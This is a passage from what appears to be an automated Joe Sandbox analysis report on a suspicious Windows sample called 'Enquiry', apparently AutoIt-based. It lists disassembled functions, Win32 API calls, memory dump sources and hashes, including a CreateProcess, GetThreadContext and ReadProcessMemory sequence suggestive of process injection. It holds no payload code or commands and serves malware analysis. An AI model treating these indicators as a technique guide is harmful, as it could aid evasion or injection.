                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Process$CurrentTerminate
                            • String ID:
                            • API String ID: 2429186680-0
                            • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                            • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                            • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                            • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                            APIs
                            • _malloc.LIBCMT ref: 0043214B
                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                            • _malloc.LIBCMT ref: 0043215D
                            • _malloc.LIBCMT ref: 0043216F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _malloc$AllocateHeap
                            • String ID:
                            • API String ID: 680241177-0
                            • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                            • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                            • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                            • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                            APIs
                            • TranslateMessage.USER32(?), ref: 00409556
                            • DispatchMessageW.USER32(?), ref: 00409561
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Message$DispatchPeekTranslate
                            • String ID:
                            • API String ID: 4217535847-0
                            • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                            • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                            • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                            • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                            APIs
                              • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                            • _free.LIBCMT ref: 004295A0
                              • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                              • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                              • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                              • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                              • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                              • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                            • String ID: >>>AUTOIT SCRIPT<<<
                            • API String ID: 3938964917-2806939583
                            • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                            • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                            • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                            • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                            Strings
                            • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _strcat
                            • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                            • API String ID: 1765576173-2684727018
                            • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                            • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                            • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                            • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: 026107fac7c7bcdbca34bd1b77142632d6848c7cf36883952a1fde06c325d7df
                            • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                            • Opcode Fuzzy Hash: 026107fac7c7bcdbca34bd1b77142632d6848c7cf36883952a1fde06c325d7df
                            • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6cc5b8d8df15f9e0ef64a75d4efc6b0a4b5787d7574181736057e5700da8ea1b
                            • Instruction ID: 87b54257044150471c739d151235b364616bdb39e4aa39848fe8ade81c39f20a
                            • Opcode Fuzzy Hash: 6cc5b8d8df15f9e0ef64a75d4efc6b0a4b5787d7574181736057e5700da8ea1b
                            • Instruction Fuzzy Hash: 0E519371A00105EBCB14DFA5C8C1EABB7A8AF48344F1481AEF905AB692D77CED45C798
                            APIs
                              • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                            • _strcat.LIBCMT ref: 0040F786
                              • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                              • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                            • String ID:
                            • API String ID: 3199840319-0
                            • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                            • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                            • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                            • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                            APIs
                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                            • FreeLibrary.KERNEL32(?), ref: 0040D78E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: FreeInfoLibraryParametersSystem
                            • String ID:
                            • API String ID: 3403648963-0
                            • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                            • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                            • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                            • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                            APIs
                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                            • __lock_file.LIBCMT ref: 00414A8D
                              • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                            • __fclose_nolock.LIBCMT ref: 00414A98
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                            • String ID:
                            • API String ID: 2800547568-0
                            • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                            • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                            • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                            • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                            APIs
                            • __lock_file.LIBCMT ref: 00415012
                            • __ftell_nolock.LIBCMT ref: 0041501F
                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __ftell_nolock__getptd_noexit__lock_file
                            • String ID:
                            • API String ID: 2999321469-0
                            • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                            • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                            • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                            • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                            APIs
                            • VariantClear.OLEAUT32(00479459), ref: 0043706B
                            • VariantCopy.OLEAUT32(00479459,00470E7C), ref: 00437076
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Variant$ClearCopy
                            • String ID:
                            • API String ID: 274517740-0
                            • Opcode ID: 175bde5d7e7200bdd07dee29e64fa583f54bc1cc1ed7ce2c810a0693f5fbc3f8
                            • Instruction ID: 04f5bc28fb39dc4d651aca37f2cae7a6fb773616424f01e3c31b72a906b86de5
                            • Opcode Fuzzy Hash: 175bde5d7e7200bdd07dee29e64fa583f54bc1cc1ed7ce2c810a0693f5fbc3f8
                            • Instruction Fuzzy Hash: 76C01236001128BB46016B99EC08CDF775CEE096617008011FD0483101C770A90087F9
                            APIs
                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0413CE9B
                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0413CF31
                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0413CF53
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728586669.000000000413B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0413B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_413b000_Enquiry.jbxd
                            Similarity
                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                            • String ID:
                            • API String ID: 2438371351-0
                            • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                            • Instruction ID: d6326024ad0d327805be17011ae6719048d0ee240ffc83bf0ed6947f83d2df30
                            • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                            • Instruction Fuzzy Hash: AB12EE24E24658C6EB24DF60D8507DEB232EF68301F1090E9910DEB7A4E77A5F81CF5A
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                            • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                            • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                            • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                            • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                            • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                            • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                            • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                            • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                            • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                            • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                            • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __lock_file
                            • String ID:
                            • API String ID: 3031932315-0
                            • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                            • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
